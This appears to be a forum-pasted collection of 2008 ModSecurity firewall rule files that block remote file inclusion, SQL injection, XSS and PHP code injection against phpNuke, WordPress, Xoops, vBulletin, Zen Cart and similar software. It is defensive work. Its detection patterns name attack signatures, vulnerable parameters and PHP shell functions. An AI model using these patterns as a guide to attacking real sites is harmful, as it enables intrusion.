SecFilterSelective REQUEST_URI "/modules\.php\?name=Bookmarks\&file=(del_cat\&catname|del_mark\&markname|edit_cat\&catname|edit_cat\&catcomment|marks\&catname|uploadbookmarks\&category)=(<[[:space:]]*script|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?name=Bookmarks\&file=marks\&catname=.*\&category=.*/\*\*/(union|select|delete|insert)"
SecFilterSelective REQUEST_URI "/index\.php\?" chain
SecFilterSelective ARG_file "(\.\./\.\.|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?*name=Search*instory="
SecFilterSelective REQUEST_URI "/modules\.php\?*name=Forums.*file=viewtopic*/forum=.*\'/"
SecFilterSelective REQUEST_URI "/banners\.php\?op=EmailStats&name=.*&bid=.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?name=.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?name=Search&author=.*&topic=.*&min.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?name=FAQ&.*=.*&id_cat=.*&categories=.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?op=EmailStats&login=.*&cid=.*&bid=.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules\.php\?name=Encyclopedia&file=.*&op=.*&eid.*1&ltr=.*((javascript|script|about|applet|activex|chrome)*\>|(http|https|ftp)\:/)"
SecFilterSelective ARG_nuke_bb_root_path "(\.\.|/|http|https|ftp)\:" "rev:1,id:HG2007102701,severity:5,deny:503,msg:'phpNuke RFI'"
SecFilterSelective REQUEST_URI "/modules\.php\?" "chain,rev:1,id:HG2007102702,severity:5,deny:503,msg:'phpNuke RFI'"
SecFilterSelective ARG_name "(\.\.|/|http|https|ftp)\:"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpprojeckt.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/(cm_navigation|cm_navigation-33|cm_summary)\.inc\.php\?" "chain,rev:1,id:HG2007101901,deny,severity:5,msg:'phpProjeckt RFI'"
SecFilterSelective REQUEST_URI "path_pre=(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/lib/(dbman_filter\.inc|specialdays)\.php\?" "chain,rev:1,id:HG2007101902,deny,severity:5,msg:'phpProjeckt RFI'"
SecFilterSelective REQUEST_URI "path_pre=(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phprealestate.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/fullnews\.php\?" "chain,rev:1,id:HG20071211205,deny,severity:5,msg:'phpRealEstate RFI'"
SecFilterSelective ARG_id "((union|select|concat|username|password).* from )|(http|ftp|\.\.)\:"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpsurveyor.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/admin/classes/pear/OLE/(PPS/File|PPS/Root|PPS)\.php\?" "chain,rev:1,id:HG2007101905,deny,severity:5,msg:'phpSurveyor RFI'"
SecFilterSelective ARG_homedir "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/admin/classes/pear/OLE/Spreadsheet/Excel/(Writer/Worksheet|Writer/Parser|Writer/Workbook|Writer/Format|Writer/BIFFwriter)\.php\?" "chain,rev:1,id:HG2007101906,deny,severity:5,msg:'phpSurveyor RFI'"
SecFilterSelective ARG_homedir "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/admin/" "chain,rev:1,id:HG2007110101,deny,severity:5,msg:'phpSurveyor SQLi'"
SecFilterSelective "ARG_sid|ARG_start|ARG_id|ARG_lid" "(alter|create|delete|describe|drop|grant|insert|rename|replace|select|truncate|update)[[:space:]]+[A-Z|a-z|0-9|*| |,]+[[:space:]](from|into|table|database|index|view)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-phpthumb.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective ARG_album "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2008030101,deny,severity:5,msg:'phpThumb album RFI'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-roundcube.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@


# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-soholaunch.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective "ARG__SESSION[docroot_path]" "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101895,deny,severity:5,msg:'SoHoAdmin RFI'"
SecFilterSelective REQUEST_URI "/login\.php\?" "chain,rev:1,id:HG2007071202,deny,severity:5,msg:'RFI: SohoAdmin CVE-2006-5236'"
SecFilterSelective REQUEST_URI "_SESSION\[docroot_path\]=(\.\.|/|http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/login\.php\?" "chain,rev:1,id:HG2007071202,deny,severity:5,msg:'RFI: SohoAdmin CVE-2006-5236'"
SecFilterSelective REQUEST_URI "_SESSION\[docroot_path\]=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/index\.php\?page=(http|https|ftp)\:" "rev:1,id:HG2007071801,deny,severity:5,msg:'RFI: CVE-2006-5590 ArticleBeach'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-squirrelmail.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@


# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-tinywebgallery.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/examples/image\.php\?" chain
SecFilterSelective REQUEST_URI "=(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-topsites.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/join\.php\?" "chain,rev:1,id:HG2007071101,severity:5,msg:'RFI: TopSites 4.x'"
SecFilterSelective REQUEST_URI "CONFIG\[path\]=(http|https|ftp)\:/"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-vbulletin.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/joinrequests\.php\?" chain
SecFilterSelective REQUEST_URI "(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9]"
SecFilterSelective REQUEST_URI "/admincp/(admincalendar|email|help|language|phrase|user|usertitle|usertools)\.php\?" chain
SecFilterSelective REQUEST_URI "(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9]"
SecFilterSelective REQUEST_URI "/modcp/announcement\.php\?" chain
SecFilterSelective REQUEST_URI "(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9]"
SecFilterSelective REQUEST_URI "/calendar\.php\?" chain
SecFilterSelective REQUEST_URI "comma=\x22;"
SecFilterSelective REQUEST_URI "/forumdisplay\.php\?[^\r\n]*comma=[^\r\n\x26]*system\x28.*\x29"
SecFilterSelective REQUEST_URI "/forumdisplay\.php\?" chain
SecFilter "\.system\(.+\)\."
SecFilterSelective REQUEST_URI "/forumdisplay\.php\?*comma="

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-webcalendar.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/day\.php\?" "chain,rev:1,deny,msg:'RFI: WebCalendar'"
SecFilterSelective ARG_date "(\.\./\.\.|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-wordpress.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective ARG_wpPATH "(\.\.|http|https|ftp)\:" "rev:1,id:HG2008012403,deny,severity:5,msg:'RFI: WP: WordTube RFI'"
SecFilterSelective REQUEST_URI "/index\.php\?" "chain,id:HG2007121203,severity:5,msg:'SQLi: WP < 2.3.1'"
SecFilterSelective ARG_s "(select.*wp_users|select.*user_pass)"
SecFilterSelective ARG_bkpwp_plugin_path "(\.\.|/|http|https|ftp)\:" "rev:1,id:HG2007120501,deny,severity:5,msg:'RFI: WP: BackupWordPress Plugin'"
SecFilterSelective REQUEST_URI "/wp-trackback\.php" "chain,id:HG2008011330,deny,severity:5,msg:'SQLi: WP'"
SecFilterSelective ARG_tb_id "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| ]+[[:space:]](from|into|table|database|index|view)"
SecFilterSelective REQUEST_URI "/index\.php\?" "chain,id:HG2008011331,deny,severity:5,msg:'SQLi: WP'"
SecFilterSelective ARG_cat "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+[[:space:]](from|into|table|database|index|view)"
SecFilterSelective REQUEST_URI "/wordpress/" "chain,id:HG2008011332,deny,severity:5,msg:'Wordpress vulnerability'"
SecFilterSelective ARG_cat "!^[0-9]*$"
SecFilterSelective ARG_cache_lastpostdate "<\?php" "id:HG2008011334,deny,severity:5,msg:'PHPi: WP'"
SecFilterSelective REQUEST_URI "/index\.php" "chain,id:HG2008011333,deny,severity:5,msg:'SQLi: WP'"
SecFilterSelective "ARG_poll|ARG_category|ARG_ctg" "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|\'|UNION.*SELECT.*INTO.*FROM)"
SecFilterSelective REQUEST_URI "/mygallerybrowser\.php\?" "chain,rev:1,id:HG2007071802,deny,severity:5,msg:'RFI: CVE-2007-2426 WordPress'"
SecFilterSelective ARG_myPath "(\.\.|/|http|https|ftp)\:"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-xmlrpc.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective THE_REQUEST "(/xmlrpc|.*xmlrpc_services)\.php" "chain,rev:1,id:HG2008011340,deny,msg:'XML rpc exploit'"
SecFilter "(\<xml|\<.*xml)" chain
SecFilter "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-xoops.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/init_basic\.php\?" "chain,rev:1,id:HG2008011002,deny,severity:5,msg:'Xoops GALLERY_BASEDIR RFI'"
SecFilterSelective ARG_GALLERY_BASEDIR "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/spaw_control\.class\.php\?" "chain,rev:1,id:HG_RFI_SPAW01,deny,severity:5,msg:'Xoops/SPAW: RFI'"
SecFilterSelective REQUEST_URI "spaw_root=(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective "ARG_xoopsConfig[root_path]" "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG_RFI_XoopsConfig,deny,severity:5,msg:'Xoops RFI'"
SecFilterSelective ARG_sid "(\.\./\.\.|/|xoops_users|(http|https|ftp)\:/)" "rev:1,id:HG_RFI_XoopsSID,deny,severity:5,msg:'Xoops RFI/SQL: SID var'"
SecFilterSelective REQUEST_URI "/xfsection/modify\.php\?" "chain,rev:1,id:HG2007101810,deny,severity:5,msg:'Xoops RFI: XFSection'"
SecFilterSelective ARG_dir_module "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules/(camportail/show|core/viewcat|debaser/genre|ecal/display|flashgames/game|friendfinder/view|kshop/product_details|library/viewcat|lykos_reviews/index|myAds/index|myalbum/viewcat|popnupblog/index|repository/viewcat|rmgallery/categos|wflinks/viewcat|rha7downloads/visit|tinyevent/index|wfquotes/index|wfsnippets/index|wfsection/print|xfsection/print|zmagazine/print)\.php\?" "chain,rev:1,id:HG2007101815,deny,severity:5,msg:'Xoops SQL'"
SecFilterSelective REQUEST_URI "(delete[[:space:]]+from|insert[[:space:]]+into|select.+from|union|xoops_users)"
SecFilterSelective REQUEST_URI "/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2\.php\?" "chain,rev:1,id:HG2007101816,deny,severity:5,msg:'Xoops RFI'"
SecFilterSelective ARG_xoops_url "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/modules/jobs/index\.php\?" "chain,rev:1,id:HG2007101817,deny,severity:5,msg:'Xoops RFI'"
SecFilterSelective REQUEST_URI "(delete[[:space:]]+from|insert[[:space:]]+into|select.+from|union|xoops_users)"
SecFilterSelective REQUEST_URI "(/xmlrpc|.*xmlrpc_services)\.php" "chain,rev:1,id:HG_XOOPS_RPCXML,deny,severity:5,msg:'Xoops XMLRPC SQL'"
SecFilterSelective POST_PAYLOAD "<methodName>blogger\.getUsersBlogs</methodName>" chain
SecFilter ".*\' AND ascii\(substring\(pass"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-zencart.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/admin/(password_forgotten|login)\.php\?" "chain,rev:1,id:HG2007071807,deny,severity:5,msg:'Zen Cart: SQL Injection'"
SecFilterSelective REQUEST_URI "(union select|into outfile|from admin)"
SecFilterSelective ARG_[loadFile] "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG20071809,deny,severity:5,msg:'Zen Cart [loadFile] RFI'"
SecFilterSelective REQUEST_URI "/ipn\.php\?cmd=" "rev:1,id:HG2008011335,deny,severity:5,msg:'Zen Cart Exploit'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-zz.exclusions.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

<LocationMatch "/rss.php?url=*p=.*">
SecFilterRemove 390144
</LocationMatch>
SecFilterSelective REMOTE_ADDR "^127\.0\.0\.1$" nolog,allow
SecFilterSelective REQUEST_URI "/whm-server-status" nolog,allow
<LocationMatch "/store/squirrelcart/paypal_ipn.php">
SecFilterRemove HG2007082202
</LocationMatch>
<LocationMatch "/wp-content/plugins/addrecords.php">
SecFilterRemove 390144
SecFilterRemove 390145
</LocationMatch>
<LocationMatch /item.php>
SecFilterRemove 390144
SecFilterRemove 390145
</LocationMatch>


[/CODE]